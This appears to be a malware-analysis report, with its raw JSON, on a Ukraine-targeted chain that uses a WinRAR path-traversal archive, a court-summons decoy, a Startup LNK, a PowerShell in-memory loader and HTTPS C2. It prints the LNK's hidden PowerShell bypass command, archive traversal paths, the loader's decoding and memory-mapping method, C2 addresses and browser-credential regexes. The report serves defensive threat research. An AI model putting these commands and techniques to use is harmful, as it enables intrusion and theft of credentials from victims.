← feed

ukraine-cve-2025-8088-court-lure-startup-lnk-zhg-c2-2026-05-28

Ukraine court-summons lure via CVE-2025-8088 archive, Startup LNK, cv4 PowerShell loader, Zhg in-memory payload and HTTPS C2

Ukraine-focused chain reconstructed from submitted artifacts and static analysis. The archive container itself was not submitted, so archive-level hash and original email metadata remain unavailable. The member names and dropped artifacts are consistent with CVE-2025-8088/WinRAR path traversal and ADS-style archive extraction semantics: a visible Ukrainian court-summons PDF is shown while hidden/traversal members place a Startup LNK and ProgramData payload components. The LNK starts hidden PowerShell through cmd.exe and executes C:\\ProgramData\\cv4. cv4 reads C:\\ProgramData\\Zhg, decodes it by subtracting 0x2b from each byte, maps the decoded flat x64 image in memory, starts it at offset 0x197a0, and uses an HTTPS status endpoint. The decoded Zhg stage contains libcurl/SChannel behavior and an RC4-like encrypted Stage-2 C2 URL.

confirmed IIM v1.1 MB-0004 needs review
Raw JSON
entities9
relations11
techniques1
published2026-05-28 17:37:25

Infrastructure map

Role-based chain map

click nodes or numbered relations to inspect the infrastructure path
entryredirectorstagingpayloadc2

Chain storyline

ordered IIM positions
1
entry

file

Ukraine-themed CVE-2025-8088 archive attachment / container not submitted

IIM-T024
2
staging

file

1070_26782818.pdf

3
staging

file

%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\U061m7RlE5py.lnk

4
staging

file

C:\ProgramData\cv4

5
payload

file

C:\ProgramData\Zhg

6
payload

file

Zhg decoded flat x64 payload image

7
c2

url

https://151.158.1.229:11861/AHH_bY/

8
c2

url

https://151.158.1.229:11861/pQWhYy/

9
c2

ip

151.158.1.229

Relations

directed infrastructure edges
archive_attachmentdropsdecoy_pdf confirmed
archive_attachmentdropsstartup_lnk confirmed
archive_attachmentdropscv4_loader confirmed
archive_attachmentdropszhg_encoded confirmed
startup_lnkexecutecv4_loader confirmed
cv4_loaderreferenceszhg_encoded confirmed
cv4_loaderexecutezhg_decoded_flat confirmed
cv4_loadercommunicates-withstage1_status_url confirmed
zhg_decoded_flatcommunicates-withstage2_c2_url confirmed
stage1_status_urlreferencesc2_ip confirmed
stage2_c2_urlreferencesc2_ip confirmed

Entities & evidence

observable inventory
IDTypeValueSource / evidence
archive_attachment file Ukraine-themed CVE-2025-8088 archive attachment / container not submitted
Original email and archive container were not submitted; entry is assessed as likely phishing based on lure and CVE-2025-8088 archive-delivery pattern.
Extracted member names include traversal/ADS-style paths for Startup LNK and ProgramData payload components.
Archive hash unavailable because only extracted/dropped members were submitted.
decoy_pdf file 1070_26782818.pdf
Visible decoy PDF is a Ukrainian court summons document dated 2026-05-28 with a Kyiv court theme and a hearing date of 2026-08-05.
SHA256=b86f8beec09529afaa8dc89bf0a0e1afd21a2be2d250281f42a28709a0733ac2; MD5=0a5708f93db05eae34d6ad6822f47c27; SHA1=99d06e713dffa63a7ebbdd4450522565ebd19f41; size=99746
startup_lnk file %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\U061m7RlE5py.lnk
LNK target resolves to C:\Windows\System32\cmd.exe.
LNK command line starts hidden/minimized PowerShell and executes C:\ProgramData\cv4 via iex (cat ... -raw).
SHA256=1ebbdf3671cd5ca25a8a8e7ca2f6e46dd22c631e01bfcc5c909ae2fd680bf458; MD5=f6edb3129d600e892e68527b10292f31; SHA1=a0317dc37c137698b7b9c9c21efafa42453c7fae; size=1205
cv4_loader file C:\ProgramData\cv4
Obfuscated PowerShell loader resolves native APIs for in-memory allocation, permission change and thread creation.
Reads C:\ProgramData\Zhg and decodes first 0x119200 bytes by subtracting 0x2b modulo 256.
Maps decoded bytes executable and starts a thread at base+0x197a0.
Disables TLS certificate validation before using the Stage-1 HTTPS status endpoint.
zhg_encoded file C:\ProgramData\Zhg
Encoded external payload consumed by C:\ProgramData\cv4.
Decodes into a flat x64 image using the loader-observed -0x2b byte transform.
SHA256=7d5f786eaaf1f8b1ea8dc12e17d16764e6424797d0e4bed05f87843aeddb32be; MD5=a1bc187fe67d1ba3c4080708468d5168; SHA1=32e6067867390cb8bd055b5acee32b7b99ff3e2c; size=1151488
zhg_decoded_flat file Zhg decoded flat x64 payload image
Decoded from Zhg using loader-observed byte transform.
Flat image contains section table and x64 code; PE wrapper was generated only for static analysis.
Contains libcurl/SChannel behavior and RC4-like encrypted strings including Stage-2 C2 URL.
SHA256=aa9505993e2171db4324ba5b7e651ef8ec524379d8e269c7acad1975fb6f8e7f; MD5=299f2f59e7fcd3242425049e9e3c98ad; SHA1=6a8ecde48ba260c9e62ad946d44610eabdb57eb6; size=1151488
stage1_status_url url https://151.158.1.229:11861/AHH_bY/
Conditional Stage-1 POST/status endpoint used by C:\ProgramData\cv4 after payload thread exit code is read.
stage2_c2_url url https://151.158.1.229:11861/pQWhYy/
Decrypted at call site 0x18000f661 and passed to CURLOPT_URL at 0x18000fb3d.
Nearby curl options indicate POST, POSTFIELDS and disabled SSL verification.
c2_ip ip 151.158.1.229
Same IP and port appear in both loader status URL and decoded Stage-2 C2 URL.

ATT&CK annotations

optional complementary mapping
T1566.001Spearphishing Attachment

Likely entry vector; original email not submitted.

T1204.002User Execution: Malicious File

Victim likely opens/extracts the archive/decoy.

T1203Exploitation for Client Execution

CVE-2025-8088 WinRAR path traversal abused by crafted archive.

T1547.001Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

LNK placed into Startup path for execution on logon.

T1059.003Command and Scripting Interpreter: Windows Command Shell

LNK starts cmd.exe /c.

T1059.001Command and Scripting Interpreter: PowerShell

Hidden PowerShell executes C:\ProgramData\cv4.

T1027Obfuscated Files or Information

PowerShell strings and payload bytes are obfuscated/encoded.

T1620Reflective Code Loading

Decoded payload is mapped into memory and executed via NtCreateThreadEx.

T1071.001Application Layer Protocol: Web Protocols

HTTPS POST endpoints over PowerShell and libcurl/SChannel.

T1555.003Credentials from Web Browsers

Tentative: decoded regex strings reference Chromium profile and encrypted key material.

Raw IIM JSON canonical body from MANTIS expand
{
  "actor_id": "UAC-0226",
  "attack_annotations": [
    {
      "comment": "Likely entry vector; original email not submitted.",
      "name": "Spearphishing Attachment",
      "tactic": "Initial Access",
      "technique_id": "T1566.001"
    },
    {
      "comment": "Victim likely opens/extracts the archive/decoy.",
      "name": "User Execution: Malicious File",
      "tactic": "Execution",
      "technique_id": "T1204.002"
    },
    {
      "comment": "CVE-2025-8088 WinRAR path traversal abused by crafted archive.",
      "name": "Exploitation for Client Execution",
      "tactic": "Execution",
      "technique_id": "T1203"
    },
    {
      "comment": "LNK placed into Startup path for execution on logon.",
      "name": "Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder",
      "tactic": "Persistence",
      "technique_id": "T1547.001"
    },
    {
      "comment": "LNK starts cmd.exe /c.",
      "name": "Command and Scripting Interpreter: Windows Command Shell",
      "tactic": "Execution",
      "technique_id": "T1059.003"
    },
    {
      "comment": "Hidden PowerShell executes C:\\ProgramData\\cv4.",
      "name": "Command and Scripting Interpreter: PowerShell",
      "tactic": "Execution",
      "technique_id": "T1059.001"
    },
    {
      "comment": "PowerShell strings and payload bytes are obfuscated/encoded.",
      "name": "Obfuscated Files or Information",
      "tactic": "Defense Evasion",
      "technique_id": "T1027"
    },
    {
      "comment": "Decoded payload is mapped into memory and executed via NtCreateThreadEx.",
      "name": "Reflective Code Loading",
      "tactic": "Defense Evasion",
      "technique_id": "T1620"
    },
    {
      "comment": "HTTPS POST endpoints over PowerShell and libcurl/SChannel.",
      "name": "Application Layer Protocol: Web Protocols",
      "tactic": "Command and Control",
      "technique_id": "T1071.001"
    },
    {
      "comment": "Tentative: decoded regex strings reference Chromium profile and encrypted key material.",
      "name": "Credentials from Web Browsers",
      "tactic": "Credential Access",
      "technique_id": "T1555.003"
    }
  ],
  "chain": [
    {
      "entity_id": "archive_attachment",
      "needs_review": true,
      "review_notes": "Original phishing email and archive container were not submitted; archive-based entry is reconstructed from dropped member paths and CVE-2025-8088 mechanics.",
      "role": "entry",
      "role_confidence": "likely",
      "technique_confidence": "confirmed",
      "techniques": [
        "IIM-T024"
      ]
    },
    {
      "entity_id": "decoy_pdf",
      "review_notes": "Visible Ukrainian court-summons decoy document.",
      "role": "staging",
      "role_confidence": "confirmed",
      "technique_confidence": "confirmed",
      "techniques": []
    },
    {
      "entity_id": "startup_lnk",
      "review_notes": "Startup persistence/launch artifact; endpoint behavior is captured in ATT&CK annotations, not IIM technique fields.",
      "role": "staging",
      "role_confidence": "confirmed",
      "technique_confidence": "confirmed",
      "techniques": []
    },
    {
      "entity_id": "cv4_loader",
      "review_notes": "PowerShell memory loader and Stage-1 status client.",
      "role": "staging",
      "role_confidence": "confirmed",
      "technique_confidence": "confirmed",
      "techniques": []
    },
    {
      "entity_id": "zhg_encoded",
      "review_notes": "Encoded external payload blob dropped to ProgramData.",
      "role": "payload",
      "role_confidence": "confirmed",
      "technique_confidence": "confirmed",
      "techniques": []
    },
    {
      "entity_id": "zhg_decoded_flat",
      "review_notes": "Decoded in-memory x64 payload image.",
      "role": "payload",
      "role_confidence": "confirmed",
      "technique_confidence": "confirmed",
      "techniques": []
    },
    {
      "entity_id": "stage1_status_url",
      "review_notes": "Stage-1 conditional POST/status endpoint.",
      "role": "c2",
      "role_confidence": "confirmed",
      "technique_confidence": "confirmed",
      "techniques": []
    },
    {
      "entity_id": "stage2_c2_url",
      "review_notes": "Stage-2 HTTPS C2 endpoint.",
      "role": "c2",
      "role_confidence": "confirmed",
      "technique_confidence": "confirmed",
      "techniques": []
    },
    {
      "entity_id": "c2_ip",
      "review_notes": "Direct IP infrastructure shared by both URL paths.",
      "role": "c2",
      "role_confidence": "confirmed",
      "technique_confidence": "confirmed",
      "techniques": []
    }
  ],
  "chain_id": "ukraine-cve-2025-8088-court-lure-startup-lnk-zhg-c2-2026-05-28",
  "confidence": "confirmed",
  "description": "Ukraine-focused chain reconstructed from submitted artifacts and static analysis. The archive container itself was not submitted, so archive-level hash and original email metadata remain unavailable. The member names and dropped artifacts are consistent with CVE-2025-8088/WinRAR path traversal and ADS-style archive extraction semantics: a visible Ukrainian court-summons PDF is shown while hidden/traversal members place a Startup LNK and ProgramData payload components. The LNK starts hidden PowerShell through cmd.exe and executes C:\\ProgramData\\cv4. cv4 reads C:\\ProgramData\\Zhg, decodes it by subtracting 0x2b from each byte, maps the decoded flat x64 image in memory, starts it at offset 0x197a0, and uses an HTTPS status endpoint. The decoded Zhg stage contains libcurl/SChannel behavior and an RC4-like encrypted Stage-2 C2 URL.",
  "entities": [
    {
      "evidence": [
        "Original email and archive container were not submitted; entry is assessed as likely phishing based on lure and CVE-2025-8088 archive-delivery pattern.",
        "Extracted member names include traversal/ADS-style paths for Startup LNK and ProgramData payload components.",
        "Archive hash unavailable because only extracted/dropped members were submitted."
      ],
      "id": "archive_attachment",
      "observed_at": "2026-05-28T00:00:00Z",
      "source": "reconstructed from submitted extracted members and artifact paths",
      "type": "file",
      "value": "Ukraine-themed CVE-2025-8088 archive attachment / container not submitted",
      "x_archive_hashes": null,
      "x_confidence_reason": "Likely archive attachment; container hash unavailable. Dropped-member evidence is confirmed.",
      "x_reconstructed_members": [
        "1070_26782818.pdf",
        "1070_26782818.pdf:..\\..\\..\\..\\..\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\U061m7RlE5py.lnk",
        "1070_26782818.pdf:..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\ProgramData\\Zhg",
        "1070_26782818.pdf:..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\ProgramData\\cv4"
      ]
    },
    {
      "evidence": [
        "Visible decoy PDF is a Ukrainian court summons document dated 2026-05-28 with a Kyiv court theme and a hearing date of 2026-08-05.",
        "SHA256=b86f8beec09529afaa8dc89bf0a0e1afd21a2be2d250281f42a28709a0733ac2; MD5=0a5708f93db05eae34d6ad6822f47c27; SHA1=99d06e713dffa63a7ebbdd4450522565ebd19f41; size=99746"
      ],
      "id": "decoy_pdf",
      "observed_at": "2026-05-28T00:00:00Z",
      "source": "submitted artifact",
      "type": "file",
      "value": "1070_26782818.pdf",
      "x_hashes": {
        "md5": "0a5708f93db05eae34d6ad6822f47c27",
        "sha1": "99d06e713dffa63a7ebbdd4450522565ebd19f41",
        "sha256": "b86f8beec09529afaa8dc89bf0a0e1afd21a2be2d250281f42a28709a0733ac2",
        "size": 99746
      },
      "x_role_detail": "visible decoy document shown to the victim while traversal/ADS-style members place payload components elsewhere"
    },
    {
      "evidence": [
        "LNK target resolves to C:\\Windows\\System32\\cmd.exe.",
        "LNK command line starts hidden/minimized PowerShell and executes C:\\ProgramData\\cv4 via iex (cat ... -raw).",
        "SHA256=1ebbdf3671cd5ca25a8a8e7ca2f6e46dd22c631e01bfcc5c909ae2fd680bf458; MD5=f6edb3129d600e892e68527b10292f31; SHA1=a0317dc37c137698b7b9c9c21efafa42453c7fae; size=1205"
      ],
      "id": "startup_lnk",
      "observed_at": "2026-05-28T00:00:00Z",
      "source": "submitted LNK artifact",
      "type": "file",
      "value": "%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\U061m7RlE5py.lnk",
      "x_command_line": " /c start /min \"\" powershell -NoPro -Wi Hidd -Exe Bypass -C \"powershell -NoP -Exec Bypass -C \"\"iex (cat 'C:\\ProgramData\\cv4' -raw)\"\"\"",
      "x_hashes": {
        "md5": "f6edb3129d600e892e68527b10292f31",
        "sha1": "a0317dc37c137698b7b9c9c21efafa42453c7fae",
        "sha256": "1ebbdf3671cd5ca25a8a8e7ca2f6e46dd22c631e01bfcc5c909ae2fd680bf458",
        "size": 1205
      },
      "x_link_target": "C:\\Windows\\System32\\cmd.exe",
      "x_lnk_flags": "0xbb",
      "x_machine_id": "desktop-hagd25b",
      "x_relative_path": "..\\..\\..\\..\\..\\..\\Windows\\System32\\cmd.exe",
      "x_window_mode": "showminnoactive",
      "x_working_dir": "C:\\Windows\\system32"
    },
    {
      "evidence": [
        "Obfuscated PowerShell loader resolves native APIs for in-memory allocation, permission change and thread creation.",
        "Reads C:\\ProgramData\\Zhg and decodes first 0x119200 bytes by subtracting 0x2b modulo 256.",
        "Maps decoded bytes executable and starts a thread at base+0x197a0.",
        "Disables TLS certificate validation before using the Stage-1 HTTPS status endpoint.",
        "Two submitted cv4 extracted-member paths had identical hashes; treated as the same dropped loader component.",
        "SHA256=2760fdddbb85327775542e8314e08aa455905d2a44a2a46871c76ab98e29a36a; MD5=8a2a9da88f1a9f859e443081cce76e9d; SHA1=ce391e045fa9cdb3803471ed52c0373ac401738c; size=92485"
      ],
      "id": "cv4_loader",
      "observed_at": "2026-05-28T00:00:00Z",
      "source": "submitted PowerShell loader artifact",
      "type": "file",
      "value": "C:\\ProgramData\\cv4",
      "x_duplicate_member_hashes": {
        "alternate_cv4_member": {
          "md5": "8a2a9da88f1a9f859e443081cce76e9d",
          "sha1": "ce391e045fa9cdb3803471ed52c0373ac401738c",
          "sha256": "2760fdddbb85327775542e8314e08aa455905d2a44a2a46871c76ab98e29a36a",
          "size": 92485
        }
      },
      "x_hashes": {
        "md5": "8a2a9da88f1a9f859e443081cce76e9d",
        "sha1": "ce391e045fa9cdb3803471ed52c0373ac401738c",
        "sha256": "2760fdddbb85327775542e8314e08aa455905d2a44a2a46871c76ab98e29a36a",
        "size": 92485
      },
      "x_loader": {
        "decode": "decoded_byte = (encoded_byte - 0x2b) & 0xff",
        "decode_length": "0x119200",
        "entry_offset": "0x197a0",
        "final_memory_protection": "PAGE_EXECUTE_READWRITE / 0x40",
        "language": "PowerShell",
        "memory_apis": [
          "NtAllocateVirtualMemory",
          "NtProtectVirtualMemory",
          "NtCreateThreadEx",
          "NtWaitForSingleObject",
          "NtClose",
          "GetExitCodeThread"
        ],
        "payload_path": "C:\\ProgramData\\Zhg"
      }
    },
    {
      "evidence": [
        "Encoded external payload consumed by C:\\ProgramData\\cv4.",
        "Decodes into a flat x64 image using the loader-observed -0x2b byte transform.",
        "SHA256=7d5f786eaaf1f8b1ea8dc12e17d16764e6424797d0e4bed05f87843aeddb32be; MD5=a1bc187fe67d1ba3c4080708468d5168; SHA1=32e6067867390cb8bd055b5acee32b7b99ff3e2c; size=1151488"
      ],
      "id": "zhg_encoded",
      "observed_at": "2026-05-28T00:00:00Z",
      "source": "submitted encoded payload artifact",
      "type": "file",
      "value": "C:\\ProgramData\\Zhg",
      "x_decode_required": "subtract 0x2b from each byte modulo 256",
      "x_hashes": {
        "md5": "a1bc187fe67d1ba3c4080708468d5168",
        "sha1": "32e6067867390cb8bd055b5acee32b7b99ff3e2c",
        "sha256": "7d5f786eaaf1f8b1ea8dc12e17d16764e6424797d0e4bed05f87843aeddb32be",
        "size": 1151488
      }
    },
    {
      "evidence": [
        "Decoded from Zhg using loader-observed byte transform.",
        "Flat image contains section table and x64 code; PE wrapper was generated only for static analysis.",
        "Contains libcurl/SChannel behavior and RC4-like encrypted strings including Stage-2 C2 URL.",
        "SHA256=aa9505993e2171db4324ba5b7e651ef8ec524379d8e269c7acad1975fb6f8e7f; MD5=299f2f59e7fcd3242425049e9e3c98ad; SHA1=6a8ecde48ba260c9e62ad946d44610eabdb57eb6; size=1151488"
      ],
      "id": "zhg_decoded_flat",
      "observed_at": "2026-05-28T00:00:00Z",
      "source": "static decode of submitted C:\\ProgramData\\Zhg",
      "type": "file",
      "value": "Zhg decoded flat x64 payload image",
      "x_hashes": {
        "md5": "299f2f59e7fcd3242425049e9e3c98ad",
        "sha1": "6a8ecde48ba260c9e62ad946d44610eabdb57eb6",
        "sha256": "aa9505993e2171db4324ba5b7e651ef8ec524379d8e269c7acad1975fb6f8e7f",
        "size": 1151488
      },
      "x_sections": [
        {
          "name": ".text",
          "raw_pointer": "0x400",
          "raw_size": "0xb2400"
        },
        {
          "name": ".rdata",
          "raw_pointer": "0xb2800",
          "raw_size": "0x2d800"
        },
        {
          "name": ".data",
          "raw_pointer": "0xe0000",
          "raw_size": "0x2fe00"
        },
        {
          "name": ".pdata",
          "raw_pointer": "0x10fe00",
          "raw_size": "0x8200"
        },
        {
          "name": ".fptable",
          "raw_pointer": "0x118000",
          "raw_size": "0x200"
        },
        {
          "name": ".reloc",
          "raw_pointer": "0x118200",
          "raw_size": "0x1000"
        }
      ],
      "x_static_findings": {
        "browser_credential_theft_indicators": [
          "profiles_order regex",
          "encrypted_key regex",
          "app_bound_encrypted_key regex"
        ],
        "crypto_string_decryptor": "RC4-like KSA/PRGA plus XOR",
        "decrypted_strings": [
          {
            "call": "0x180007d7d",
            "plaintext": "\"profiles_order\"\\s*:\\s*\\[([^\\]]+)",
            "purpose": "Chrome profile order regex"
          },
          {
            "call": "0x1800087f3",
            "plaintext": "\"encrypted_key\"\\s*:\\s*\"([^\"]+)\"",
            "purpose": "encrypted_key regex"
          },
          {
            "call": "0x18000882f",
            "plaintext": "\"app_bound_encrypted_key\"\\s*:\\s*\"([^\"]+)\"",
            "purpose": "app_bound_encrypted_key regex"
          },
          {
            "call": "0x18000f661",
            "plaintext": "https://151.158.1.229:11861/pQWhYy/",
            "purpose": "Stage-2 C2 URL"
          }
        ],
        "probe_url": "http://1.1.1.1"
      }
    },
    {
      "evidence": [
        "Conditional Stage-1 POST/status endpoint used by C:\\ProgramData\\cv4 after payload thread exit code is read."
      ],
      "id": "stage1_status_url",
      "observed_at": "2026-05-28T00:00:00Z",
      "source": "deobfuscated PowerShell loader string",
      "type": "url",
      "value": "https://151.158.1.229:11861/AHH_bY/",
      "x_http_method": "POST",
      "x_port": 11861,
      "x_protocol": "HTTPS",
      "x_tls_validation": "disabled in PowerShell via ServicePointManager.ServerCertificateValidationCallback = { $true }"
    },
    {
      "evidence": [
        "Decrypted at call site 0x18000f661 and passed to CURLOPT_URL at 0x18000fb3d.",
        "Nearby curl options indicate POST, POSTFIELDS and disabled SSL verification."
      ],
      "id": "stage2_c2_url",
      "observed_at": "2026-05-28T00:00:00Z",
      "source": "RC4-like decrypted Stage-2 PE string",
      "type": "url",
      "value": "https://151.158.1.229:11861/pQWhYy/",
      "x_decryption": {
        "algorithm": "RC4-like keystream XOR",
        "call_site": "0x18000f661",
        "curlopt_url_site": "0x18000fb3d"
      },
      "x_http_method": "POST",
      "x_port": 11861,
      "x_protocol": "HTTPS",
      "x_tls_validation": "disabled in libcurl options CURLOPT_SSL_VERIFYPEER=0 and CURLOPT_SSL_VERIFYHOST=0"
    },
    {
      "evidence": [
        "Same IP and port appear in both loader status URL and decoded Stage-2 C2 URL."
      ],
      "id": "c2_ip",
      "observed_at": "2026-05-28T00:00:00Z",
      "source": "shared host component in Stage-1 and Stage-2 URLs",
      "type": "ip",
      "value": "151.158.1.229",
      "x_ports": [
        11861
      ],
      "x_roles": [
        "stage1_status_endpoint",
        "stage2_c2_endpoint"
      ]
    }
  ],
  "iim_version": "1.1",
  "import_source": "manual-static-analysis; uploaded artifacts; IIM v1.1 schema; public CVE-2025-8088 reporting",
  "needs_review": false,
  "observed_at": "2026-05-28T19:30:00Z",
  "relations": [
    {
      "confidence": "confirmed",
      "from": "archive_attachment",
      "observed_at": "2026-05-28T00:00:00Z",
      "sequence_order": 1,
      "to": "decoy_pdf",
      "type": "drops"
    },
    {
      "confidence": "confirmed",
      "from": "archive_attachment",
      "observed_at": "2026-05-28T00:00:00Z",
      "sequence_order": 2,
      "to": "startup_lnk",
      "type": "drops"
    },
    {
      "confidence": "confirmed",
      "from": "archive_attachment",
      "observed_at": "2026-05-28T00:00:00Z",
      "sequence_order": 3,
      "to": "cv4_loader",
      "type": "drops"
    },
    {
      "confidence": "confirmed",
      "from": "archive_attachment",
      "observed_at": "2026-05-28T00:00:00Z",
      "sequence_order": 4,
      "to": "zhg_encoded",
      "type": "drops"
    },
    {
      "confidence": "confirmed",
      "from": "startup_lnk",
      "observed_at": "2026-05-28T00:00:00Z",
      "sequence_order": 5,
      "to": "cv4_loader",
      "type": "execute"
    },
    {
      "confidence": "confirmed",
      "from": "cv4_loader",
      "observed_at": "2026-05-28T00:00:00Z",
      "sequence_order": 6,
      "to": "zhg_encoded",
      "type": "references"
    },
    {
      "confidence": "confirmed",
      "from": "cv4_loader",
      "observed_at": "2026-05-28T00:00:00Z",
      "sequence_order": 7,
      "to": "zhg_decoded_flat",
      "type": "execute"
    },
    {
      "confidence": "confirmed",
      "from": "cv4_loader",
      "observed_at": "2026-05-28T00:00:00Z",
      "sequence_order": 8,
      "to": "stage1_status_url",
      "type": "communicates-with"
    },
    {
      "confidence": "confirmed",
      "from": "zhg_decoded_flat",
      "observed_at": "2026-05-28T00:00:00Z",
      "sequence_order": 9,
      "to": "stage2_c2_url",
      "type": "communicates-with"
    },
    {
      "confidence": "confirmed",
      "from": "stage1_status_url",
      "observed_at": "2026-05-28T00:00:00Z",
      "sequence_order": 10,
      "to": "c2_ip",
      "type": "references"
    },
    {
      "confidence": "confirmed",
      "from": "stage2_c2_url",
      "observed_at": "2026-05-28T00:00:00Z",
      "sequence_order": 11,
      "to": "c2_ip",
      "type": "references"
    }
  ],
  "title": "Ukraine court-summons lure via CVE-2025-8088 archive, Startup LNK, cv4 PowerShell loader, Zhg in-memory payload and HTTPS C2",
  "x_analysis_scope": {
    "archive_container": "not submitted; reconstructed from extracted member names and dropped artifacts",
    "attribution": "unset intentionally",
    "entry_assessment": "phishing attachment is likely but not directly proven because original email headers/body were not submitted",
    "execution": "not executed; static analysis only"
  },
  "x_cve": {
    "id": "CVE-2025-8088",
    "product": "WinRAR for Windows / related RAR extraction components",
    "public_sources": [
      "https://nvd.nist.gov/vuln/detail/CVE-2025-8088",
      "https://cloud.google.com/blog/topics/threat-intelligence/exploiting-critical-winrar-vulnerability",
      "https://www.eset.com/us/about/newsroom/research/eset-research-russian-romcom-group-exploits-new-vulnerability-targets-companies-in-europe-and-canada/"
    ],
    "use_in_chain": "crafted archive member names place LNK and ProgramData payload files outside the visible decoy path",
    "vulnerability_class": "path traversal via crafted archive and alternate-data-stream extraction semantics"
  },
  "x_source_title": "MANTIS MWDB",
  "x_source_url": "https://mantis.malwarebox.eu/shared/fE79d6pHSVp2Fvac5XvBOtzxhrH5ldWh",
  "x_victim_context": {
    "focus": "Ukraine",
    "hearing_date_in_lure": "2026-08-05",
    "lure_document_date": "2026-05-28",
    "lure_language": "Ukrainian",
    "lure_theme": "court summons / administrative offense",
    "pii_note": "Named person/address values from the decoy are intentionally omitted from this chain."
  }
}